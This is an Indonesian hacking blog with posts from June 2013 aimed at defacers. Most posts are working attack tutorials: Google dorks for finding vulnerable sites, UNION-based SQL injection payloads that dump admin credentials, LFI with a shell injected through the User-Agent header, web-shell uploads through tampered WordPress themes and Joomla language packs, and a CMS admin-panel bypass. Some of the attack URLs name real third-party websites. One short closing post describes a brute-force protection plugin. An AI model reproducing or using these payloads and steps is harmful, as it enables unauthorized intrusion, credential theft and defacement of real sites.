Senin, 24 Juni 2013

0 Powerful Dork For SQLi [1]

10.25 Under From Unknown
[0 Comment]
Untuk para defacer. Saya akan bagikan dork untuk mencari vulnerable server. Dork ini akan mencari web yang vulnerable terhadap SQLi type UNION QUERY

dork : "The used SELECT statements have a different number of columns" inurl:product.php
Contoh :
Happy Hunting =)
Read More »

0 Vulnerable By Design [1-25]

10.12 Under From Unknown
[0 Comment]
Vulnerable by design? Ya, dilemahkan oleh design. Operasi-operasi sistem ini memiliki vulnerable yang unik, tidak semua peretas dapat menemukan celah keamanan operasi sistem ini. Bahkan saya ragu pada peretas yang bermulut besar dapat menemukan celah kemanan operasi sistem ini.

Lalu, untuk apa operasi-operasi sistem ini dibuat? Tentu saja untuk melatih para penetration tester dalam mengasah kemampuan menganalisa dan mencari vulnerability sebuah operasi sistem. Tujuan akhir para penetration tester yang menguji OS ini adalah untuk mendapatkan hak akses (privilege) tertinggi dalam OS ini. Mengingat OS ini berbasis linux, maka anda selaku penetration tester harus dapat mendapatkan akun root dalam OS ini. Mudahkah? Beberapa dari OS ini mudah di retas, bahkan diretas hingga ke akarnya (root). 
Dalam blog ini, beberapa jenis Vulnerable by Design telah dipaparkan, sebut saja kioptrix level 1, kioptrix level 3, kioptrix level 4, de ice, dan banyak lagi. Salah satu rahasia memiliki kemampuan analisa tinggi, adalah mencoba tantangan ini, tantangan untuk memperoleh root dalam box box vulnerable ini. Percayalah, ketika anda mendapatkan root dari salah satu vulnerable by design, anda akan langsung mendapatkan banyak ilmu mengenai sistem keamanan dalam UNIX server dan non-server.
Kemampuan menganalisan vulnerability saya berawal dari proses ini, dimana kemampuan penguasaan tools backtrack benar-benar diuji dalam usaha mendapatkan root dalam box ini. Dan satu hal yang saya pelajari dari rooting box ini:
"Jangan bergantung pada segelintir tools yang dimiliki oleh backtrack dalam meretas satu system, anda tidak tau betapa berbahayanya mereka ketika semua tools bahu membahu mengikis pertahanan sebuah system. Tingkat keberhasilan anda bergantung pada banyaknya tools yang dapat anda gunakan dalam peretasan sebuah system."
Berikut saya akan membagi beberapa vulnerable by design yang bisa anda coba untuk mempertajam kemampuan penetration testing anda.
1. De - ICE
Level yang tersedia : Level 1 - Disk 1 , Level 1 - Disk 2, Level 1 - Disk 3, Level 2 - Disk 1
2. Hackademic
Level yang tersedia : Level 1 (Box 1), Level 2 (Box 2)
3. Holynix
Level Yang tersedia : Level 1, Level 2
4. Kioptrix
Level yang tersedia : Level 1 , Level 2, Level 3, Level 4
5. Metasploitable
Level yang tersedia : Level 1 , level 2
6. NcN 2011
Level yang tersedia : Level 1 , Level 2, Level 3, Level 4, Level 5, Level 6
7. NETinVM
Level yang tersedia : Level 1, Level 2, Level 3
8. pWnOS
Level yang tersedia : Level 1
9. RuCTFE
Level yang tersedia : Level 1
10. vulnimage
Level yang tersedia : Level 1
11. BadStore
Level yang  tersedia : Level 1
12. BodeIT
Level yang teredia : Level 1
13. Damn Vulnerable Web App
Level yang tersedia : Level 1
14. Hacme
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5
15. Hackxor
Level yang tersedia : Level 1
16. LAMPSecurity
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5, Level 6
17. Moth
Level yang tersedia : Level 1, Level 2, Level 3, Level 4, Level 5, Level 6
18. Mulitilidae
Level yang tersedia : Level 1 (v 1.5)
19. OWASP Broken Web Application Project
Level yang tersedia : Level 1 (v 0.92rc1)
20. OWASP Hackademic Challenge Project 
Level yang tersedia : Level 1
21. OWASP Insecure Web App Project
Level yang tersedia : Level 1
22. OWASP Vicnum
Level yang tersedia : Level 1 (v 1.4)
23. OWASP WebGoat
Level yang tersedia : Level 1 
24. PuzzleMail
Level yang tersedia : 1
25. SecurityBench 
Level yang tersedia : Level 1 (Normal), Level 2 (Micro)
Ada lebih dari 50 OS Vulnerable yang pernah dibuat untuk dijadikan sarana belajara para peserta Hackademic, dan para penetration tester. Untuk saat ini, saya akan membagikan 25 OS terlebih dahulu. Beberapa dari OS diatas pernah diulas di dalam blog ini, jika anda ingin mencari tau apa yang harus anda lakukan untuk merooting OS ini, ada baiknya anda menggunakan vitur search pada blog ini. Good luck, and have fun. (=
Read More »

Sabtu, 15 Juni 2013

0 salah satu bug CMS

08.22 Under From Unknown
[0 Comment]


mau berbagi sedikit tentang salah satu CMS (nama CMSnya aku g tau,hi...hi..hi)
bug yg sangat fatal.di cms terdapat suatu bug yg terletak pada script content.php
dan pada module usernya.
ok let's begin
1. searching target dengan dork "allinurl:media.php?module="
2. tentukan target.jika sudah dapat lanjut ke berikutnya
3. tester pertam yaitu mengetahui page adminnya dengan menambakan dir admin di belakang target
misal : http://target.com/admin

4. setelah kebuka,lanjut keberikutnya yaitu dengan langsung menuju ke content module usernya.
dengan menambahkan content.php?module=user
misal : http://target.com/admin/content.php?module=user

5. nah kan kalo kebuka.. di situ kita bisa edit user or admin atau jg bisa namabahin lagi user loginnya
tuh... jadi terserah anda mau edit ato mau add user/tambah user.

nah untuk langkah selanjutnya terserah kalian....

nah kalo yg mau berbentuk video....
silahkan download disini
Read More »

0 LFI dan Upload Shell via tamper data

08.21 Under From Unknown
[0 Comment]
assalamualaikum wr. wb.

saya hanya ingin berbagi apa yang saya ketahui.sekarang saya akan berbagi tentang serangan web dengan tehnik LFI
dan cara upload shell dengan Tamper data
kalian persiapkan target atao cari target dengan dork yg kalian miliki masing2
kalo dah daptin target selanjutnya :
1. cek target kalian apakah vuln LFI dengan ../ jika keluar error maka web target bisa kita serang dengan method LFI
misal disini saya menggunakan target http://www.droonet.com/index.php?option=com_photobattle&view=
jadi hasilnya kaya gini http://www.droonet.com/index.php?option=com_photobattle&view=../
2. tambahin dengan etc/passwd ini untuk mencari letak file passwd, jika masih keluar error maka kita tambahin direktori
ato ../ sampe g keluar error ato file passwd bisa di eksekusi.
jadi hasilnya kaya gini :
http://www.droonet.com/index.php?option=com_photobattle&view=../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../etc/passwd <--- error http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../etc/passwd <--- dah g error lagi

3. bila sudah tidak keluar pesan error lagi ato file passwd dah bisa di kesekusi maka langkah selanjutnya kita ubah etc/passwd
dengan proc/self/environ. ini untuk mengecek apa file environ apa bisa di akses ato tidak.jadi hasilnya kaya ini
http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../proc/self/environ

jika sukses ato environ bisa di akses maka akan keluar pesan seperti pada gambar :


4. kalo sukses,saatnya kita upload shell via tamper data,kalo belum pnya silahkan di download or install di
https://addons.mozilla.org/en-US/firefox/addon/966
5. kalo udah terpasang,selanjutnya buka tamper datanya yg ada di tools - Tamper Data,kemudian klik start tamper
6. kemudian buka lagi url yg di atas
http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../proc/self/environ
7. kemudian muncul dialog box seperti pada gambar.klik az tamper,kemudian akan muncul jendela baru lagi

8. nah di jendela baru ubah User-Agent menjadi script injection shell. scriptnya seperti ini

jika kalian pny link sendiri tempat menyimpan shell,pake az pny kalian masing2.jika lom pnya silahkan pake itu az
gak apa2.

9. klik ok,maka mozilla yg di url http://www.droonet.com/index.php?option=com_photobattle&view=../../../../../../proc/self/environ
akan ngeloading,kalo dah selesai loading,kalo keluar forbidden,maka proses penguploadan shell gagal.stop tamper datanya.
10. sekarang saatnya kita coba buka shellnya,shell akan berada di
http://target.com/nama shell.php
jadi seperti ini
http://www.droonet.com/shell.php

jika shell ke eksekusi maka langkah selanjutnya terserah kalian.
untuk yg masih bingun silahkan download video tutornya disini

thenk's
semoga bermanfaat dan berguna..

wassalam
Read More »

0 How Upload Shell in wordpress

08.20 Under From Unknown
[0 Comment]
Assalamualaikum wr. Wb.



Cara upload shell di wordpress g juh beda dengan upload shell di joomla. Untuk cara upload shell di wordpress yang saya pake adalah dengan cara install theme wordpress. Jadi kalian membutuhkan pack theme wordpress,jadi searching dulu di google,banyak tuch. Setelah dapet themenya,mari kita masuk ke page admin target wordpress.



1. masuk ke apperaeance – klik add new,



2. kemudian akan muncul sebuah page untuk melakukan upload,sebelum kalian upload,kalian edit salah satu dari file yg ada di pack theme yg kalian miliki,misal file index.php kita edit,kita ubah script index.php menjadi script shell kita.kemudian kalian save dan pack lagi dengan zip.
3. upload dan install file pack themenya.tunggu sekejap.kalo dah keluar pesan sukses maka berarti sukse,tinggal kita cari tempat shell kita berada di mana.
4. untuk tempat shell berada,karena theme wordpress biasanya berda pada public_html/wp-content/themes/nama direktori/nama file yang kita edit tadi.
Misal nama direktorinya mystique
Dan nama filenya index.php
So hasilnya kurang lebih sepeti ini “http://target.com/wp-content/theme/mystique/index.php”


Terus tekan enter , jreeeeeeeeeeeennnnngggggg shell kebuka di hadapan kita,dan kita bisa leluasa mau ngapain az di shell ke web target.
buat kalian yang bingung dan males baca tulisan ini bisa juga liatvideonya disini
untuk yang males nyari2 theme bisa di ambil disini yang sudah saya edit.
Selamat menoba dan semoga tulisan ini bermanfaat dan berguna

Thenk’s
Read More »

0 SQL Injection

08.18 Under From Unknown
[0 Comment]
untuk para master2 jangan di ketawain nich artikel cupu dari dopunk.
sekarang saya mau membagi sedikit apa itu sql Injection??temen-temen pastinya dah sering dengar istilah ini,istilah ini sangat merakyat di kalangan dunia perkomputeran.apa sich SQL?SQL yaitu Structure Query Language yg maksudnya adalah suatu bahasa pemorgraman yang berfungsi untuk menyimpan data-data berupa string,integer dan lain-lain.atau dengan kata kerennya yaitu database (tempat ato gudang data :D).SQL fungsinya sama dengan dbase yg lain seperti microsoft acces,oracle dll.nah untuk SQL injection sendiri adalah suatu tehnik dimana kita akan mencuri data-data penting di dalam sql.nah untuk cara-caranya sebagai berikut ,
pertama-tama pastinya kita harus mempunyai target yang mau di inject sqlnya.nah untuk mempermudah kita mencari target kita gunain mesin search engine google az.dengan bantuan keyword di bawah ini :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?id=
inurl:play_old.php?id=
inurl:newsitem.php?id=
inurl:readnews.php?id=
inurl:top10.php?id=
inurl:historialeer.php?id=
inurl:reagir.php?id=
inurl:Stray-Questions-View.php?id=
inurl:forum_bds.php?id=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?id=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=


ketikkan keyword di atas di google (pilih salah satu)kemudian enter.
nah kemudian muncullah target-target yang akan kita buat uji coba.
kedua,setelah kalian menetapkan target,maka untuk langkah selanjutnya melakukan test pada target tsb apa ada bug (error or kesalahan) dalam sqlnya.gimana caranya?caranya dengan menggunakan tanda singgle quote (') atau tanda petik satu.jadi hasilnya kaya gini kurang lebih :
htttp://target.com/products.php?id=1'

ketiga,jika dengan pentest tsb keluar pesan error di target.maka target tsb bisa kita inject sqlnya atao bahasa kerennya target itu vuln (mode on : so tau).maka untuk langkah selanjutnya kita akan mengecek berapa banyak kolom yg terdapat dalam sql tsb,dengan menggunakan perintah "order by" seperti contoh berikut :
http://target.com/products.php?id=-1 order by 1

kita cek kolomna dengan mengubah angka di belakang order by.sampe di target mengeluarkan pesan error lagi,contoh:
http://target.com/products.php?id=-1
order by 5

nah di saat pada angka 5 udah ada pesan error makan kita berhenti di situ.

keempat,setelah kita mengetahui berapa banyak kolom yg ada di sql tsb,waktunya kita melihat kolom berapa az yg ada isinya,dengan menggunakan perintah "union select".contoh:
http://target.com/products.php?id=-1 union select 1,2,3,4,5


kelima,jika di target mengeluarkan angka,misal keluar angka 2,kita coba liat isinya di angka 2.pertama kita liat versinya dulu ya,kalo versi 4 maka kita bahas di tahap selanjutnya ato kalian googling sendiri ya :D.untuk cara melihat versi berapakah sql yg di pake di target maka kita gunakan perintah "version()".contoh :
http://target.com/products.php?id=-1 union select 1,version(),3,4,5


keenam,nah setelah mengetahui versi sql kita lanjut melihat isinya,gimana caranya?caranya yaitu dengan menggunakan "group_concat(table_name)" dan di angka paling akhir kita kasih embel2 "from information_schema.tables".contoh :
http://target.com/products.php?id=-1 union select 1,group_concat(table_name),3,4,5 from information_schema.tables

setelah information isi dari kolom 2 keluar,maka waktunya kita memilih dari isi itu yg begitu penting.

ketujuh,setelah menetapkan memilih salah satu isi,maka langkah selanjutnya kita mengkonversi string tsb menjadi hexa.misal kita memilih "admin" maka kita konversi ascii "admin" ke hexa sehingga menjadi 61646D696E.

kedelapan,langkah selanjutnya kita masuk lebih dalem,yaitu kitamelihat isi dari admin.dengan perintah "group_concat(column_name" dan di belakang angka terakhir di kasih embel2 "from informaion_schema.columns where table_name=0x61646D696E".jadi sehingga menjadi kaya gini kurang lebih :
http://target.com/products.php?id=-1 union select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=0x61646D696E


kesembilan,setelah hasil itu keluar maka langkah terakhir yaitu melihat lagi lebih dalem isi dari admin.misal dari hasil di atas keluar id,username,pass.maka kita keluarin isi dari hasil ketiga tersebut.

terakhir,cara ngeluarin ato mau isi lihat dari id,username,pass maka kita guanakan perintah : "group_concat(id,0x3a,username,0x3a,pass)" di belakang angka terakhir kasih perintah "from admin"
jadi seperti ini kurang lebih :
http://target.com/products.php?id=-1 union select 1,group_concat(id,0x3a,username,0x3a,pass),3,4,5 from admin


nah dengan perintah di atas kita sudah mendapatkan user dan pass suatu target.gampang kan??

selamat mencoba az ya..

semoga berguna
thenk's
Read More »

0 Video Upload shell di JOOmla

08.17 Under From Unknown
[0 Comment]
mungkin ada banyak temen-temen yg bingung gimana sich caranya upload shell di joomla??
nah ini ada sedikit tutor video dapet dari googlin,aku bagi2 az ya..and gunain untuk kebaikan ya???
silahkan ambil disini tutornya
Read More »

0 Inject web joomla + Upload shell

08.13 Under From Unknown
[0 Comment]
assalamualaikum
Nah pada kesempatan kali ini,saya akan share gimana cara inject web joomla dan cara mengupload shell ato backdoor(pintu belakang).untuk kali ini kita akan menginject joomla pada komponen com_tour. kita bisa mencari exploitnya di beberapa tempat,seperti milw0rm,db-exploits,inject0r,dll.
coba buka salahsatu web tsb,disini saya coba membuka web innject0r pilih pada page search. Kemudian kita ketik com_tour




Dari web itu kita mendapatkan exploit : -999+UNION+ALL+SELECT+1,2,3,4

Ok sekarang kita ke topic.
1. cari target dengan dork “inurl:index.php?option=com_tour”
2. tetapkan target, saya mencoba mengambil target :
http://himalayareisen.ch
/index.php?option=com_tour&view=trip&id=7&Itemid=91&lang=de
3. masukkan exploit di url web target hasilnya kurang lebih seperti ini :
http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4--&Itemid=91&lang=de



Lah koq keluar error??nah di sini kita harus pinter2 membaca error yg muncul.untuk error itu ternyata nomer column yg kita masukkan salah.so kita cek ulang nomor kolomnya,deengan command “order by”.setelaha di cek ternyata pada column 36 terjadi error

4. kemudian kita cek di kolom berapa yg ada isinya dengan exploit yg tadi,bedanya untuk angkanya yang ini sampe 35. maka hasilnya :
http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35--&Itemid=91&lang=de

keluar table no 29,berarti ada sesuatu di 29,kita cek aja yuk
5. kita lihat nama2 tablenya,seperti step injection di kolom 29. Dengan menggunakan “group_concat(table_name)”.nah hasilnya kurang lebih seperti ini :
http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_concat(table_name),30,31,32,33,34,35 from information_schema.tables where table_schema=database()--&Itemid=91&lang=de

jika di situ ada sebagian yang ketutup,kalian bisa liat dengan cara klik 2x pada isi table yg muncul kemudian copas di notepad,atau bisa juga denga view page sourcenya
6. cari nama yg menurut kalian isinya penting,disini saya memilih nama jos_
user,kemudian kita convert jos_users ke hexa dengan tools kesayangan kalian masing-masing.
7. hasil convert dari jos_users adalah 6A6F735F7573657273. nah sekarang kita masukkan ke url dengan command “group_concat(column_name),maka hasilnya :
http://himalayareisen.ch/index.php?option=com_tour&view=trip&id=-7+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,group_concat(column_name),30,31,32,33,34,35 from information_schema.columns where table_name=0x6A6F735F7573657273--&Itemid=91&lang=de

8. maka akan keluar isi dari kolom jos_users,yaitu : id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activations,params. Maka kita pilih seperlunya az untuk isinya yang akan kita lihat.karena sekarang untuk crack pass menggunakan reset pass,maka yang akan kita butuhkan email,activations yang lain bias mendukung untuk cari tahu info yang lain seperti username,password,dll



9. untuk peresetan pass kita perlu exploit yaitu “index.php?option=com_user&view=reset”. Maka hasilnya :
http://himalayareisen.ch/ index.php?option=com_user&view=reset.




10. kita masukkan alamat email sang admin,nah setelah itu akan mucul page lagi yang akan meminta code activations,jadi kita masukkan az code activationnya jangan ragu-ragu.



11. ini waktunya yang kita tunggu-tunggu,yaitu merubah pass admin dan masuk sebagai admin.setelah code activation di submit or di send maka akan muncul form permintaan ganti pass dengan yang baru,jadi gantilah passnya terserah kalian



12. kalo dah terkirim ato di submit,kita langsung az menuju page adminnya yang berada di http://himalayareisen.ch/administrator isi user name dengan info yang tadi (yg ada di column jos_users) untuk passnya,isi dengan apa yang kalian ketik di form permintaan pass.
13. sekarang waktunya upload shell.langsung az kalian masuk ke extensions – install/uninstall,kita akan memakai cara dengan menginstal language pack.jadi kalo kalian belum ada silahkan download and search in google.
14. sebelum kalian upload tuch language pack,kalian harus edit dulu beberapa file yg ada di pack tsb,diantaranya install.xml dan index.html
15. untuk install.xml yg kita edita adalah “index.html” index.html kita ubah menjadi index.php jadi hasilnya : index.php.kemudian save
16. terus edit index.html nya,untuk index.html kalian hapus isinya,kalian ganti dengan script shell kalian. Terus ekstensinya kita ubah menjadi php jadi hasilnya index.php bukan index.html lagi
17. setelah semuanya beres,kita pack lagi menjadi zip.kemudian kita upload and install di extensions – install/uninstall (form install)



18. setelah sukses install language.sekarang bingung letak filenya,and nama direktorynya apa?ok,jadi untuk kita mengetahui di mana shell kita berada silahkan kalian upload lagi language tadi,nanti akan muncul keluar pesan error,di pesan error itulah nanti ada alamt tempat shell kita bearada



Nah pada gambar tsb ada tulisan yg ditandai,itu adalah alamat shell nya,jadi shellnya ada pada languages/en-US/index.php jadi hasilnya :
http://himalayareisen.ch/ languages/en-US/index.php


Mudah kan,g seruwet yang kalian bayangkan.bila kalian males membacanya nich ada video tutornya silahkan diambil disini,untuk language pack yg udah saya edit silahkan di unduh di sini
Jadi selamat mencoba az dah dan semoga tutor ini bermanfaat dan berguna bagi yang membaca,karena tulisan ini banyak sekali kesalahan,kekurangan,dan kehilafan hendaknya kalian sudi untuk mengoreksi,memberi saran,memberi kritikan tulisan ini,karena itu akan membantu kami untuk lebih berbenah diri. Sekian dulu terima kasih.

assalamualaikum
Read More »

Jumat, 14 Juni 2013

0 Download Koleksi Shell/Backdoor

00.40 Under From Unknown
[0 Comment]
Buat yang suka Pepesan Silahkan di pilih apa kesukaan shell anda, dan klik di nama nya untuk mendownload nya…

List Shell :
Read More »

Jumat, 07 Juni 2013

0 Plugin WordPress ~ Login LockDown

09.54 Under From Unknown
[0 Comment]

Assalamualaikum sobat IDCA, di blog udah dishare beberapa macam tutorial attacking website, sekarang gantian pengamanannya yaa :D

Login LockDown , plugin ini mencatat alamat IP dan timestamp dari setiap kegagalan login pada CMS Wordpress. Jika sudah melebihi jumlah kesalahan login yang sudah ditentukan maka IP akan di banned.
Untuk mengubah Settingan nya silahkan Anda gunakan PLUGIN ini melalui panel Options. Admisitrators dapat melepaskan kunci di luar rentang IP secara manual.
Plugin ini untuk menghindari serangan attacker yang memanfaatkan metode " Brute Force Attack " yaitu serangan yang menebak password untuk login ke suatu website.
Bagi temen temen IDCA yang berminta memasang plugin ini, bisa kalian download disini :
Read More »